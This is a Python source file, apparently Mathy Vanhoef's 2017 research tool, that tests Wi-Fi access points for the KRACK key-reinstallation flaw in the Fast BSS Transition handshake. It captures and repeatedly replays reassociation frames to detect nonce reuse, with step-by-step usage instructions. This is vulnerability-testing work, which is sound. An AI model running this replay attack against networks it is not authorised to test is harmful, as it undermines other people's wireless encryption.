krack-ft-test.py 12 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340
  1. #!/usr/bin/env python2
  2. # Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
  3. #
  4. # This code may be distributed under the terms of the BSD license.
  5. # See README for more details.
  6. import logging
  7. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  8. from scapy.all import *
  9. import sys, socket, struct, time, subprocess, atexit, select
  10. from datetime import datetime
  11. IEEE_TLV_TYPE_RSN = 48
  12. IEEE_TLV_TYPE_FT = 55
  13. IEEE80211_RADIOTAP_RATE = (1 << 2)
  14. IEEE80211_RADIOTAP_CHANNEL = (1 << 3)
  15. IEEE80211_RADIOTAP_TX_FLAGS = (1 << 15)
  16. IEEE80211_RADIOTAP_DATA_RETRIES = (1 << 17)
  17. #TODO: - !!! Detect retransmissions based on packet time and sequence counter (see client tests) !!!
  18. #TODO: - Merge code with client tests to avoid code duplication (including some error handling)
  19. #TODO: - Detect new EAPOL handshake or normal association frames (reset state and stop replaying)
  20. #TODO: - Option to use a secondary interface for injection + WARNING if a virtual interface is used + repeat advice to disable hardware encryption
  21. #TODO: - Test whether injection works on the virtual interface (send probe requests to nearby AP and wait for replies)
  22. #TODO: - Execute rfkill unblock wifi because some will forget this
  23. # FIXME: We are repeating the "disable hw encryption" script to client tests
  24. USAGE = """{name} - Tool to test Key Reinstallation Attacks against an AP
  25. To test wheter an AP is vulnerable to a Key Reinstallation Attack against
  26. the Fast BSS Transition (FT) handshake, take the following steps:
  27. 1. The hardware encryption engine of some Wi-Fi NICs have bugs that interfere
  28. with our script. So disable hardware encryption by executing:
  29. ./disable-hwcrypto.sh
  30. This only needs to be done once. It's recommended to reboot after executing
  31. this script. After plugging in your Wi-Fi NIC, use `systool -vm ath9k_htc`
  32. or similar to confirm the nohwcript/.. param has been set. We tested this
  33. with an a TP-Link TL-WN722N and an Alfa AWUS051NH v2.
  34. 2. Create a wpa_supplicant configuration file that can be used to connect
  35. to the network. A basic example is:
  36. ctrl_interface=/var/run/wpa_supplicant
  37. network={{
  38. ssid="testnet"
  39. key_mgmt=FT-PSK
  40. psk="password"
  41. }}
  42. Note the use of "FT-PSK". Save it as network.conf or similar. For more
  43. info see https://w1.fi/cgit/hostap/plain/wpa_supplicant/wpa_supplicant.conf
  44. 3. Try to connect to the network using your platform's wpa_supplicant.
  45. This will likely require a command such as:
  46. sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf
  47. If this fails, either the AP does not support FT, or you provided the wrong
  48. network configuration options in step 1.
  49. 4. Use this script as a wrapper over the previous wpa_supplicant command:
  50. sudo {name} wpa_supplicant -D nl80211 -i wlan0 -c network.conf
  51. This will execute the wpa_supplicant command using the provided parameters,
  52. and will add a virtual monitor interface that will perform attack tests.
  53. 5. Use wpa_cli to roam to a different AP of the same network. For example:
  54. sudo wpa_cli -i wlan0
  55. > status
  56. bssid=c4:e9:84:db:fb:7b
  57. ssid=testnet
  58. ...
  59. > scan_results
  60. bssid / frequency / signal level / flags / ssid
  61. c4:e9:84:db:fb:7b 2412 -21 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet
  62. c4:e9:84:1d:a5:bc 2412 -31 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet
  63. ...
  64. > roam c4:e9:84:1d:a5:bc
  65. ...
  66. In this example we were connected to AP c4:e9:84:db:fb:7b of testnet (see
  67. status command). The scan_results command shows this network also has a
  68. second AP with MAC c4:e9:84:1d:a5:bc. We then roam to this second AP.
  69. 6. Generate traffic between the AP and client. For example:
  70. sudo arping -I wlan0 192.168.1.10
  71. 7. Now look at the output of {name} to see if the AP is vulnerable.
  72. 6a. First it should say "Detected FT reassociation frame". Then it will
  73. start replaying this frame to try the attack.
  74. 6b. The script shows which IVs (= packet numbers) the AP is using when
  75. sending data frames.
  76. 6c. Message "IV reuse detected (IV=X, seq=Y). AP is vulnerable!" means
  77. we confirmed it's vulnerable.
  78. !! Be sure to manually check network traces as well, to confirm this script
  79. !! is replaying the reassociation request properly, and to manually confirm
  80. !! whether there is IV (= packet number) reuse or not.
  81. Example output of vulnerable AP:
  82. [15:59:24] Replaying Reassociation Request
  83. [15:59:25] AP transmitted data using IV=1 (seq=0)
  84. [15:59:25] Replaying Reassociation Request
  85. [15:59:26] AP transmitted data using IV=1 (seq=0)
  86. [15:59:26] IV reuse detected (IV=1, seq=0). AP is vulnerable!
  87. Example output of patched AP (note that IVs are never reused):
  88. [16:00:49] Replaying Reassociation Request
  89. [16:00:49] AP transmitted data using IV=1 (seq=0)
  90. [16:00:50] AP transmitted data using IV=2 (seq=1)
  91. [16:00:50] Replaying Reassociation Request
  92. [16:00:51] AP transmitted data using IV=3 (seq=2)
  93. [16:00:51] Replaying Reassociation Request
  94. [16:00:52] AP transmitted data using IV=4 (seq=3)
  95. """
  96. #### Basic output and logging functionality ####
  97. ALL, DEBUG, INFO, STATUS, WARNING, ERROR = range(6)
  98. COLORCODES = { "gray" : "\033[0;37m",
  99. "green" : "\033[0;32m",
  100. "orange": "\033[0;33m",
  101. "red" : "\033[0;31m" }
  102. global_log_level = INFO
  103. def log(level, msg, color=None, showtime=True):
  104. if level < global_log_level: return
  105. if level == DEBUG and color is None: color="gray"
  106. if level == WARNING and color is None: color="orange"
  107. if level == ERROR and color is None: color="red"
  108. print (datetime.now().strftime('[%H:%M:%S] ') if showtime else " "*11) + COLORCODES.get(color, "") + msg + "\033[1;0m"
  109. #### Packet Processing Functions ####
  110. class MitmSocket(L2Socket):
  111. def __init__(self, **kwargs):
  112. super(MitmSocket, self).__init__(**kwargs)
  113. def send(self, p):
  114. # Hack: set the More Data flag so we can detect injected frames (and so clients stay awake longer)
  115. p[Dot11].FCfield |= 0x20
  116. L2Socket.send(self, RadioTap()/p)
  117. def _strip_fcs(self, p):
  118. # Scapy can't handle the optional Frame Check Sequence (FCS) field automatically
  119. if p[RadioTap].present & 2 != 0:
  120. rawframe = str(p[RadioTap])
  121. pos = 8
  122. while ord(rawframe[pos - 1]) & 0x80 != 0: pos += 4
  123. # If the TSFT field is present, it must be 8-bytes aligned
  124. if p[RadioTap].present & 1 != 0:
  125. pos += (8 - (pos % 8))
  126. pos += 8
  127. # Remove FCS if present
  128. if ord(rawframe[pos]) & 0x10 != 0:
  129. return Dot11(str(p[Dot11])[:-4])
  130. return p[Dot11]
  131. def recv(self, x=MTU):
  132. p = L2Socket.recv(self, x)
  133. if p == None or not Dot11 in p: return None
  134. # Hack: ignore frames that we just injected and are echoed back by the kernel
  135. if p[Dot11].FCfield & 0x20 != 0:
  136. return None
  137. # Strip the FCS if present, and drop the RadioTap header
  138. return self._strip_fcs(p)
  139. def close(self):
  140. super(MitmSocket, self).close()
  141. def dot11_get_seqnum(p):
  142. return p[Dot11].SC >> 4
  143. def dot11_get_iv(p):
  144. """Scapy can't handle Extended IVs, so do this properly ourselves (only works for CCMP)"""
  145. if Dot11WEP not in p:
  146. log(ERROR, "INTERNAL ERROR: Requested IV of plaintext frame")
  147. return 0
  148. wep = p[Dot11WEP]
  149. if wep.keyid & 32:
  150. return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (struct.unpack(">I", wep.wepdata[:4])[0] << 16)
  151. else:
  152. return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (ord(wep.iv[2]) << 16)
  153. def get_tlv_value(p, type):
  154. if not Dot11Elt in p: return None
  155. el = p[Dot11Elt]
  156. while isinstance(el, Dot11Elt):
  157. if el.ID == type:
  158. return el.info
  159. el = el.payload
  160. return None
  161. #### Man-in-the-middle Code ####
  162. class KRAckAttackFt():
  163. def __init__(self, interface):
  164. self.nic_iface = interface
  165. self.nic_mon = interface + "mon"
  166. self.clientmac = scapy.arch.get_if_hwaddr(interface)
  167. self.sock = None
  168. self.wpasupp = None
  169. self.reassoc = None
  170. self.ivs = set()
  171. self.next_replay = None
  172. def handle_rx(self):
  173. p = self.sock.recv()
  174. if p == None: return
  175. # Detect whether hardware encryption is decrypting the frame, *and* removing the TKIP/CCMP
  176. # header of the (now decrypted) frame.
  177. # FIXME: Put this check in MitmSocket? We want to check this in client tests as well!
  178. if self.clientmac in [p.addr1, p.addr2] and Dot11WEP in p:
  179. # If the hardware adds/removes the TKIP/CCMP header, this is where the plaintext starts
  180. payload = str(p[Dot11WEP])
  181. # Check if it's indeed a common LCC/SNAP plaintext header of encrypted frames, and
  182. # *not* the header of a plaintext EAPOL handshake frame
  183. if payload.startswith("\xAA\xAA\x03\x00\x00\x00") and not payload.startswith("\xAA\xAA\x03\x00\x00\x00\x88\x8e"):
  184. log(ERROR, "ERROR: Virtual monitor interface doesn't seem to pass 802.11 encryption header to userland.")
  185. log(ERROR, " Try to disable hardware encryption, or use a 2nd interface for injection.", showtime=False)
  186. quit(1)
  187. if p.addr2 == self.clientmac and Dot11ReassoReq in p:
  188. if get_tlv_value(p, IEEE_TLV_TYPE_RSN) and get_tlv_value(p, IEEE_TLV_TYPE_FT):
  189. log(INFO, "Detected FT reassociation frame")
  190. self.reassoc = p
  191. self.next_replay = time.time() + 1
  192. else:
  193. log(INFO, "Reassociation frame does not appear to be an FT one")
  194. self.reassoc = None
  195. self.ivs = set()
  196. elif p.addr2 == self.clientmac and Dot11AssoReq in p:
  197. log(INFO, "Detected normal association frame")
  198. self.reassoc = None
  199. self.ivs = set()
  200. elif p.addr1 == self.clientmac and Dot11WEP in p:
  201. iv = dot11_get_iv(p)
  202. log(INFO, "AP transmitted data using IV=%d (seq=%d)" % (iv, dot11_get_seqnum(p)))
  203. # FIXME: When the client disconnects (or reconnects), clear the set of used IVs
  204. if iv in self.ivs:
  205. log(INFO, ("IV reuse detected (IV=%d, seq=%d). " +
  206. "AP is vulnerable!") % (iv, dot11_get_seqnum(p)), color="green")
  207. self.ivs.add(iv)
  208. def configure_interfaces(self):
  209. log(STATUS, "Note: disable Wi-Fi in your network manager so it doesn't interfere with this script")
  210. # 1. Remove unused virtual interfaces to start from a clean state
  211. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  212. # 2. Configure monitor mode on interfaces
  213. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  214. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  215. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  216. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  217. time.sleep(0.5)
  218. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  219. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  220. def run(self):
  221. self.configure_interfaces()
  222. self.sock = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  223. # Open the wpa_supplicant client that will connect to the network that will be tested
  224. self.wpasupp = subprocess.Popen(sys.argv[1:])
  225. # Monitor the virtual monitor interface of the client and perform the needed actions
  226. while True:
  227. sel = select.select([self.sock], [], [], 1)
  228. if self.sock in sel[0]: self.handle_rx()
  229. if self.reassoc and time.time() > self.next_replay:
  230. log(INFO, "Replaying Reassociation Request")
  231. self.sock.send(self.reassoc)
  232. self.next_replay = time.time() + 1
  233. def stop(self):
  234. log(STATUS, "Closing wpa_supplicant and cleaning up ...")
  235. if self.wpasupp:
  236. self.wpasupp.terminate()
  237. self.wpasupp.wait()
  238. if self.sock: self.sock.close()
  239. def cleanup():
  240. attack.stop()
  241. def argv_get_interface():
  242. for i in range(len(sys.argv)):
  243. if not sys.argv[i].startswith("-i"):
  244. continue
  245. if len(sys.argv[i]) > 2:
  246. return sys.argv[i][2:]
  247. else:
  248. return sys.argv[i + 1]
  249. return None
  250. if __name__ == "__main__":
  251. if len(sys.argv) <= 1 or "--help" in sys.argv or "-h" in sys.argv:
  252. print USAGE.format(name=sys.argv[0])
  253. quit(1)
  254. # TODO: Verify that we only accept CCMP?
  255. interface = argv_get_interface()
  256. if not interface:
  257. log(ERROR, "Failed to determine wireless interface. Specify one using the -i parameter.")
  258. quit(1)
  259. attack = KRAckAttackFt(interface)
  260. atexit.register(cleanup)
  261. attack.run()